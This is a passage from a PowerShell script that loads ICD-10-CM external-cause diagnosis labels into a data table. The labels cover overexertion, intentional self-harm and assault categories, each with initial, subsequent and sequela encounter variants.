$DiagnosisList.Rows.Add("Overexertion from prolonged static or awkward postures","Overexertion from prolonged static or awkward postures, sequela") + $null = $DiagnosisList.Rows.Add("Overexertion from repetitive movements","Overexertion from repetitive movements, initial encounter") + $null = $DiagnosisList.Rows.Add("Overexertion from repetitive movements","Overexertion from repetitive movements, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Overexertion from repetitive movements","Overexertion from repetitive movements, sequela") + $null = $DiagnosisList.Rows.Add("Other and unspecified overexertion or strenuous movements or postures","Other and unspecified overexertion or strenuous movements or postures, initial encounter") + $null = $DiagnosisList.Rows.Add("Other and unspecified overexertion or strenuous movements or postures","Other and unspecified overexertion or strenuous movements or postures, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other and unspecified overexertion or strenuous movements or postures","Other and unspecified overexertion or strenuous movements or postures, sequela") + $null = $DiagnosisList.Rows.Add("Prolonged stay in weightless environment","Prolonged stay in weightless environment, initial encounter") + $null = $DiagnosisList.Rows.Add("Prolonged stay in weightless environment","Prolonged stay in weightless environment, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Prolonged stay in weightless environment","Prolonged stay in weightless environment, sequela") + $null = $DiagnosisList.Rows.Add("Exposure to other specified factors","Exposure to other specified factors, initial encounter") + $null = $DiagnosisList.Rows.Add("Exposure to other specified factors","Exposure to other specified factors, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Exposure to other specified factors","Exposure to other specified factors, sequela") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by drowning and submersion while in bathtub","Intentional self-harm by drowning and submersion while in bathtub, initial encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by drowning and submersion while in bathtub","Intentional self-harm by drowning and submersion while in bathtub, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by drowning and submersion while in bathtub","Intentional self-harm by drowning and submersion while in bathtub, sequela") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by drowning and submersion while in swimming pool","Intentional self-harm by drowning and submersion while in swimming pool, initial encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by drowning and submersion while in swimming pool","Intentional self-harm by drowning and submersion while in swimming pool, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by drowning and submersion while in swimming pool","Intentional self-harm by drowning and submersion while in swimming pool, sequela") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by drowning and submersion after jump into swimming pool","Intentional self-harm by drowning and submersion after jump into swimming pool, initial encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by drowning and submersion after jump into swimming pool","Intentional self-harm by drowning and submersion after jump into swimming pool, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by drowning and submersion after jump into swimming pool","Intentional self-harm by drowning and submersion after jump into swimming pool, sequela") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by drowning and submersion in natural water","Intentional self-harm by drowning and submersion in natural water, initial encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by drowning and submersion in natural water","Intentional self-harm by drowning and submersion in natural water, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by drowning and submersion in natural water","Intentional self-harm by drowning and submersion in natural water, sequela") + $null = $DiagnosisList.Rows.Add("Other intentional self-harm by drowning and submersion","Other intentional self-harm by drowning and submersion, initial encounter") + $null = $DiagnosisList.Rows.Add("Other intentional self-harm by drowning and submersion","Other intentional self-harm by drowning and submersion, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other intentional self-harm by drowning and submersion","Other intentional self-harm by drowning and submersion, sequela") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by drowning and submersion, unspecified","Intentional self-harm by drowning and submersion, unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by drowning and submersion, unspecified","Intentional self-harm by drowning and submersion, unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by drowning and submersion, unspecified","Intentional self-harm by drowning and submersion, unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by handgun discharge","Intentional self-harm by handgun discharge, initial encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by handgun discharge","Intentional self-harm by handgun discharge, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by handgun discharge","Intentional self-harm by handgun discharge, sequela") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by shotgun discharge","Intentional self-harm by shotgun discharge, initial encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by shotgun discharge","Intentional self-harm by shotgun discharge, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by shotgun discharge","Intentional self-harm by shotgun discharge, sequela") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by hunting rifle discharge","Intentional self-harm by hunting rifle discharge, initial encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by hunting rifle discharge","Intentional self-harm by hunting rifle discharge, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by hunting rifle discharge","Intentional self-harm by hunting rifle discharge, sequela") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by machine gun discharge","Intentional self-harm by machine gun discharge, initial encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by machine gun discharge","Intentional self-harm by machine gun discharge, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by machine gun discharge","Intentional self-harm by machine gun discharge, sequela") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by other larger firearm discharge","Intentional self-harm by other larger firearm discharge, initial encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by other larger firearm discharge","Intentional self-harm by other larger firearm discharge, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by other larger firearm discharge","Intentional self-harm by other larger firearm discharge, sequela") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by unspecified larger firearm discharge","Intentional self-harm by unspecified larger firearm discharge, initial encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by unspecified larger firearm discharge","Intentional self-harm by unspecified larger firearm discharge, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by unspecified larger firearm discharge","Intentional self-harm by unspecified larger firearm discharge, sequela") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by airgun","Intentional self-harm by airgun, initial encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by airgun","Intentional self-harm by airgun, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by airgun","Intentional self-harm by airgun, sequela") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by paintball gun","Intentional self-harm by paintball gun, initial encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by paintball gun","Intentional self-harm by paintball gun, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by paintball gun","Intentional self-harm by paintball gun, sequela") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by other gas, air or spring-operated gun","Intentional self-harm by other gas, air or spring-operated gun, initial encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by other gas, air or spring-operated gun","Intentional self-harm by other gas, air or spring-operated gun, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by other gas, air or spring-operated gun","Intentional self-harm by other gas, air or spring-operated gun, sequela") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by other firearm discharge","Intentional self-harm by other firearm discharge, initial encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by other firearm discharge","Intentional self-harm by other firearm discharge, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by other firearm discharge","Intentional self-harm by other firearm discharge, sequela") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by unspecified firearm discharge","Intentional self-harm by unspecified firearm discharge, initial encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by unspecified firearm discharge","Intentional self-harm by unspecified firearm discharge, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by unspecified firearm discharge","Intentional self-harm by unspecified firearm discharge, sequela") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by explosive material","Intentional self-harm by explosive material, initial encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by explosive material","Intentional self-harm by explosive material, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by explosive material","Intentional self-harm by explosive material, sequela") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by smoke, fire and flames","Intentional self-harm by smoke, fire and flames, initial encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by smoke, fire and flames","Intentional self-harm by smoke, fire and flames, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by smoke, fire and flames","Intentional self-harm by smoke, fire and flames, sequela") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by steam or hot vapors","Intentional self-harm by steam or hot vapors, initial encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by steam or hot vapors","Intentional self-harm by steam or hot vapors, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by steam or hot vapors","Intentional self-harm by steam or hot vapors, sequela") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by hot tap water","Intentional self-harm by hot tap water, initial encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by hot tap water","Intentional self-harm by hot tap water, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by hot tap water","Intentional self-harm by hot tap water, sequela") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by other hot fluids","Intentional self-harm by other hot fluids, initial encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by other hot fluids","Intentional self-harm by other hot fluids, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by other hot fluids","Intentional self-harm by other hot fluids, sequela") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by hot household appliances","Intentional self-harm by hot household appliances, initial encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by hot household appliances","Intentional self-harm by hot household appliances, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by hot household appliances","Intentional self-harm by hot household appliances, sequela") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by other hot objects","Intentional self-harm by other hot objects, initial encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by other hot objects","Intentional self-harm by other hot objects, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by other hot objects","Intentional self-harm by other hot objects, sequela") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by unspecified hot objects","Intentional self-harm by unspecified hot objects, initial encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by unspecified hot objects","Intentional self-harm by unspecified hot objects, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by unspecified hot objects","Intentional self-harm by unspecified hot objects, sequela") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by sharp glass","Intentional self-harm by sharp glass, initial encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by sharp glass","Intentional self-harm by sharp glass, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by sharp glass","Intentional self-harm by sharp glass, sequela") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by knife","Intentional self-harm by knife, initial encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by knife","Intentional self-harm by knife, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by knife","Intentional self-harm by knife, sequela") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by sword or dagger","Intentional self-harm by sword or dagger, initial encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by sword or dagger","Intentional self-harm by sword or dagger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by sword or dagger","Intentional self-harm by sword or dagger, sequela") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by other sharp object","Intentional self-harm by other sharp object, initial encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by other sharp object","Intentional self-harm by other sharp object, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by other sharp object","Intentional self-harm by other sharp object, sequela") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by unspecified sharp object","Intentional self-harm by unspecified sharp object, initial encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by unspecified sharp object","Intentional self-harm by unspecified sharp object, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by unspecified sharp object","Intentional self-harm by unspecified sharp object, sequela") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by blunt object","Intentional self-harm by blunt object, initial encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by blunt object","Intentional self-harm by blunt object, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by blunt object","Intentional self-harm by blunt object, sequela") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by jumping from a high place","Intentional self-harm by jumping from a high place, initial encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by jumping from a high place","Intentional self-harm by jumping from a high place, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by jumping from a high place","Intentional self-harm by jumping from a high place, sequela") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by jumping or lying in front of motor vehicle","Intentional self-harm by jumping or lying in front of motor vehicle, initial encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by jumping or lying in front of motor vehicle","Intentional self-harm by jumping or lying in front of motor vehicle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by jumping or lying in front of motor vehicle","Intentional self-harm by jumping or lying in front of motor vehicle, sequela") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by jumping or lying in front of (subway) train","Intentional self-harm by jumping or lying in front of (subway) train, initial encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by jumping or lying in front of (subway) train","Intentional self-harm by jumping or lying in front of (subway) train, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by jumping or lying in front of (subway) train","Intentional self-harm by jumping or lying in front of (subway) train, sequela") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by jumping or lying in front of other moving object","Intentional self-harm by jumping or lying in front of other moving object, initial encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by jumping or lying in front of other moving object","Intentional self-harm by jumping or lying in front of other moving object, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by jumping or lying in front of other moving object","Intentional self-harm by jumping or lying in front of other moving object, sequela") + $null = $DiagnosisList.Rows.Add("Intentional collision of motor vehicle with other motor vehicle","Intentional collision of motor vehicle with other motor vehicle, initial encounter") + $null = $DiagnosisList.Rows.Add("Intentional collision of motor vehicle with other motor vehicle","Intentional collision of motor vehicle with other motor vehicle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Intentional collision of motor vehicle with other motor vehicle","Intentional collision of motor vehicle with other motor vehicle, sequela") + $null = $DiagnosisList.Rows.Add("Intentional collision of motor vehicle with train","Intentional collision of motor vehicle with train, initial encounter") + $null = $DiagnosisList.Rows.Add("Intentional collision of motor vehicle with train","Intentional collision of motor vehicle with train, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Intentional collision of motor vehicle with train","Intentional collision of motor vehicle with train, sequela") + $null = $DiagnosisList.Rows.Add("Intentional collision of motor vehicle with tree","Intentional collision of motor vehicle with tree, initial encounter") + $null = $DiagnosisList.Rows.Add("Intentional collision of motor vehicle with tree","Intentional collision of motor vehicle with tree, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Intentional collision of motor vehicle with tree","Intentional collision of motor vehicle with tree, sequela") + $null = $DiagnosisList.Rows.Add("Other intentional self-harm by crashing of motor vehicle","Other intentional self-harm by crashing of motor vehicle, initial encounter") + $null = $DiagnosisList.Rows.Add("Other intentional self-harm by crashing of motor vehicle","Other intentional self-harm by crashing of motor vehicle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other intentional self-harm by crashing of motor vehicle","Other intentional self-harm by crashing of motor vehicle, sequela") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by crashing of aircraft","Intentional self-harm by crashing of aircraft, initial encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by crashing of aircraft","Intentional self-harm by crashing of aircraft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by crashing of aircraft","Intentional self-harm by crashing of aircraft, sequela") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by electrocution","Intentional self-harm by electrocution, initial encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by electrocution","Intentional self-harm by electrocution, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by electrocution","Intentional self-harm by electrocution, sequela") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by exposure to extremes of cold","Intentional self-harm by exposure to extremes of cold, initial encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by exposure to extremes of cold","Intentional self-harm by exposure to extremes of cold, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by exposure to extremes of cold","Intentional self-harm by exposure to extremes of cold, sequela") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by other specified means","Intentional self-harm by other specified means, initial encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by other specified means","Intentional self-harm by other specified means, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Intentional self-harm by other specified means","Intentional self-harm by other specified means, sequela") + $null = $DiagnosisList.Rows.Add("Assault by drowning and submersion while in bathtub","Assault by drowning and submersion while in bathtub, initial encounter") + $null = $DiagnosisList.Rows.Add("Assault by drowning and submersion while in bathtub","Assault by drowning and submersion while in bathtub, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Assault by drowning and submersion while in bathtub","Assault by drowning and submersion while in bathtub, sequela") + $null = $DiagnosisList.Rows.Add("Assault by drowning and submersion while in swimming pool","Assault by drowning and submersion while in swimming pool, initial encounter") + $null = $DiagnosisList.Rows.Add("Assault by drowning and submersion while in swimming pool","Assault by drowning and submersion while in swimming pool, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Assault by drowning and submersion while in swimming pool","Assault by drowning and submersion while in swimming pool, sequela") + $null = $DiagnosisList.Rows.Add("Assault by drowning and submersion after push into swimming pool","Assault by drowning and submersion after push into swimming pool, initial encounter") + $null = $DiagnosisList.Rows.Add("Assault by drowning and submersion after push into swimming pool","Assault by drowning and submersion after push into swimming pool, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Assault by drowning and submersion after push into swimming pool","Assault by drowning and submersion after push into swimming pool, sequela") + $null = $DiagnosisList.Rows.Add("Assault by drowning and submersion in natural water","Assault by drowning and submersion in natural water, initial encounter") + $null = $DiagnosisList.Rows.Add("Assault by drowning and submersion in natural water","Assault by drowning and submersion in natural water, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Assault by drowning and submersion in natural water","Assault by drowning and submersion in natural water, sequela") + $null = $DiagnosisList.Rows.Add("Other assault by drowning and submersion","Other assault by drowning and submersion, initial encounter") + $null = $DiagnosisList.Rows.Add("Other assault by drowning and submersion","Other assault by drowning and submersion, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other assault by drowning and submersion","Other assault by drowning and submersion, sequela") + $null = $DiagnosisList.Rows.Add("Assault by drowning and submersion, unspecified","Assault by drowning and submersion, unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Assault by drowning and submersion, unspecified","Assault by drowning and submersion, unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Assault by drowning and submersion, unspecified","Assault by drowning and submersion, unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Assault by handgun discharge","Assault by handgun discharge, initial encounter") + $null = $DiagnosisList.Rows.Add("Assault by handgun discharge","Assault by handgun discharge, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Assault by handgun discharge","Assault by handgun discharge, sequela") + $null = $DiagnosisList.Rows.Add("Assault by shotgun","Assault by shotgun, initial encounter") + $null = $DiagnosisList.Rows.Add("Assault by shotgun","Assault by shotgun, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Assault by shotgun","Assault by shotgun, sequela") + $null = $DiagnosisList.Rows.Add("Assault by hunting rifle","Assault by hunting rifle, initial encounter") + $null = $DiagnosisList.Rows.Add("Assault by hunting rifle","Assault by hunting rifle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Assault by hunting rifle","Assault by hunting rifle, sequela") + $null = $DiagnosisList.Rows.Add("Assault by machine gun","Assault by machine gun, initial encounter") + $null = $DiagnosisList.Rows.Add("Assault by machine gun","Assault by machine gun, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Assault by machine gun","Assault by machine gun, sequela") + $null = $DiagnosisList.Rows.Add("Assault by other larger firearm discharge","Assault by other larger firearm discharge, initial encounter") + $null = $DiagnosisList.Rows.Add("Assault by other larger firearm discharge","Assault by other larger firearm discharge, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Assault by other larger firearm discharge","Assault by other larger firearm discharge, sequela") + $null = $DiagnosisList.Rows.Add("Assault by unspecified larger firearm discharge","Assault by unspecified larger firearm discharge, initial encounter") + $null = $DiagnosisList.Rows.Add("Assault by unspecified larger firearm discharge","Assault by unspecified larger firearm discharge, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Assault by unspecified larger firearm discharge","Assault by unspecified larger firearm discharge, sequela") + $null = $DiagnosisList.Rows.Add("Assault by airgun discharge","Assault by airgun discharge, initial encounter") + $null = $DiagnosisList.Rows.Add("Assault by airgun discharge","Assault by airgun discharge, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Assault by airgun discharge","Assault by airgun discharge, sequela") + $null = $DiagnosisList.Rows.Add("Assault by paintball gun discharge","Assault by paintball gun discharge, initial encounter") + $null = $DiagnosisList.Rows.Add("Assault by paintball gun discharge","Assault by paintball gun discharge, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Assault by paintball gun discharge","Assault by paintball gun discharge, sequela") + $null = $DiagnosisList.Rows.Add("Assault by other gas, air or spring-operated gun","Assault by other gas, air or spring-operated gun, initial encounter") + $null = $DiagnosisList.Rows.Add("Assault by other gas, air or spring-operated gun","Assault by other gas, air or spring-operated gun, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Assault by other gas, air or spring-operated gun","Assault by other gas, air or spring-operated gun, sequela") + $null = $DiagnosisList.Rows.Add("Assault by other firearm discharge","Assault by other firearm discharge, initial encounter") + $null = $DiagnosisList.Rows.Add("Assault by other firearm discharge","Assault by other firearm discharge, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Assault by other firearm discharge","Assault by other firearm discharge, sequela") + $null = $DiagnosisList.Rows.Add("Assault by unspecified firearm discharge","Assault by unspecified firearm discharge, initial encounter") + $null = $DiagnosisList.Rows.Add("Assault by unspecified firearm discharge","Assault by unspecified firearm discharge, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Assault by unspecified firearm discharge","Assault by unspecified firearm discharge, sequela") + $null = $DiagnosisList.Rows.Add("Assault by antipersonnel bomb","Assault by antipersonnel bomb, initial encounter") + $null = $DiagnosisList.Rows.Add("Assault by antipersonnel bomb","Assault by antipersonnel bomb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Assault by antipersonnel bomb","Assault by antipersonnel bomb, sequela") + $null = $DiagnosisList.Rows.Add("Assault by gasoline bomb","Assault by gasoline bomb, initial encounter") + $null = $DiagnosisList.Rows.Add("Assault by gasoline bomb","Assault by gasoline bomb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Assault by gasoline bomb","Assault by gasoline bomb, sequela") + $null = $DiagnosisList.Rows.Add("Assault by letter bomb","Assault by letter bomb, initial encounter") + $null = $DiagnosisList.Rows.Add("Assault by letter bomb","Assault by letter bomb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Assault by letter bomb","Assault by letter bomb, sequela") + $null = $DiagnosisList.Rows.Add("Assault by fertilizer bomb","Assault by fertilizer bomb, initial encounter") + $null = $DiagnosisList.Rows.Add("Assault by fertilizer bomb","Assault by fertilizer bomb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Assault by fertilizer bomb","Assault by fertilizer bomb, sequela") + $null = $DiagnosisList.Rows.Add("Assault by pipe bomb","Assault by pipe bomb, initial encounter") + $null = $DiagnosisList.Rows.Add("Assault by pipe bomb","Assault by pipe bomb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Assault by pipe bomb","Assault by pipe bomb, sequela") + $null = $DiagnosisList.Rows.Add("Assault by other specified explosive","Assault by other specified explosive, initial encounter") + $null = $DiagnosisList.Rows.Add("Assault by other specified explosive","Assault by other specified explosive, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Assault by other specified explosive","Assault by other specified explosive, sequela") + $null = $DiagnosisList.Rows.Add("Assault by unspecified explosive","Assault by unspecified explosive, initial encounter") + $null = $DiagnosisList.Rows.Add("Assault by unspecified explosive","Assault by unspecified explosive, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Assault by unspecified explosive","Assault by unspecified explosive, sequela") + $null = $DiagnosisList.Rows.Add("Assault by smoke, fire and flames","Assault by smoke, fire and flames, initial encounter") + $null = $DiagnosisList.Rows.Add("Assault by smoke, fire and flames","Assault by smoke, fire and flames, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Assault by smoke, fire and flames","Assault by smoke, fire and flames, sequela") + $null = $DiagnosisList.Rows.Add("Assault by steam or hot vapors","Assault by steam or hot vapors, initial encounter") + $null = $DiagnosisList.Rows.Add("Assault by steam or hot vapors","Assault by steam or hot vapors, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Assault by steam or hot vapors","Assault by steam or hot vapors, sequela") + $null = $DiagnosisList.Rows.Add("Assault by hot tap water","Assault by hot tap water, initial encounter") + $null = $DiagnosisList.Rows.Add("Assault by hot tap water","Assault by hot tap water, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Assault by hot tap water","Assault by hot tap water, sequela") + $null = $DiagnosisList.Rows.Add("Assault by hot fluids","Assault by hot fluids, initial encounter") + $null = $DiagnosisList.Rows.Add("Assault by hot fluids","Assault by hot fluids, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Assault by hot fluids","Assault by hot fluids, sequela") + $null = $DiagnosisList.Rows.Add("Assault by hot household appliances","Assault by hot household appliances, initial encounter") + $null = $DiagnosisList.Rows.Add("Assault by hot household appliances","Assault by hot household appliances, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Assault by hot household appliances","Assault by hot household appliances, sequela") + $null = $DiagnosisList.Rows.Add("Assault by other hot objects","Assault by other hot objects, initial encounter") + $null = $DiagnosisList.Rows.Add("Assault by other hot objects","Assault by other hot objects, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Assault by other hot objects","Assault by other hot objects, sequela") + $null = $DiagnosisList.Rows.Add("Assault by unspecified hot objects","Assault by unspecified hot objects, initial encounter") + $null = $DiagnosisList.Rows.Add("Assault by unspecified hot objects","Assault by unspecified hot objects, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Assault by unspecified hot objects","Assault by unspecified hot objects, sequela") + $null = $DiagnosisList.Rows.Add("Assault by sharp glass","Assault by sharp glass, initial encounter") + $null = $DiagnosisList.Rows.Add("Assault by sharp glass","Assault by sharp glass, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Assault by sharp glass","Assault by sharp glass, sequela") + $null = $DiagnosisList.Rows.Add("Assault by knife","Assault by knife, initial encounter") + $null = $DiagnosisList.Rows.Add("Assault by knife","Assault by knife, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Assault by knife","Assault by knife, sequela") + $null = $DiagnosisList.Rows.Add("Assault by sword or dagger","Assault by sword or dagger, initial encounter") + $null = $DiagnosisList.Rows.Add("Assault by sword or dagger","Assault by sword or dagger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Assault by sword or dagger","Assault by sword or dagger, sequela") + $null = $DiagnosisList.Rows.Add("Assault by other sharp object","Assault by other sharp object, initial encounter") + $null = $DiagnosisList.Rows.Add("Assault by other sharp object","Assault by other sharp object, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Assault by other sharp object","Assault by other sharp object, sequela") + $null = $DiagnosisList.Rows.Add("Assault by unspecified sharp object","Assault by unspecified sharp object, initial encounter") + $null = $DiagnosisList.Rows.Add("Assault by unspecified sharp object","Assault by unspecified sharp object, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Assault by unspecified sharp object","Assault by unspecified sharp object, sequela") + $null = $DiagnosisList.Rows.Add("Assault by blunt object","Assault by blunt object, initial encounter") + $null = $DiagnosisList.Rows.Add("Assault by blunt object","Assault by blunt object, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Assault by blunt object","Assault by blunt object, sequela") + $null = $DiagnosisList.Rows.Add("Assault by pushing from high place","Assault by pushing from high place, initial encounter") + $null = $DiagnosisList.Rows.Add("Assault by pushing from high place","Assault by pushing from high place, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Assault by pushing from high place","Assault by pushing from high place, sequela") + $null = $DiagnosisList.Rows.Add("Assault by pushing or placing victim in front of motor vehicle","Assault by pushing or placing victim in front of motor vehicle, initial encounter") + $null = $DiagnosisList.Rows.Add("Assault by pushing or placing victim in front of motor vehicle","Assault by pushing or placing victim in front of motor vehicle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Assault by pushing or placing victim in front of motor vehicle","Assault by pushing or placing victim in front of motor vehicle, sequela") + $null = $DiagnosisList.Rows.Add("Assault by pushing or placing victim in front of (subway) train","Assault by pushing or placing victim in front of (subway) train, initial encounter") + $null = $DiagnosisList.Rows.Add("Assault by pushing or placing victim in front of (subway) train","Assault by pushing or placing victim in front of (subway) train, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Assault by pushing or placing victim in 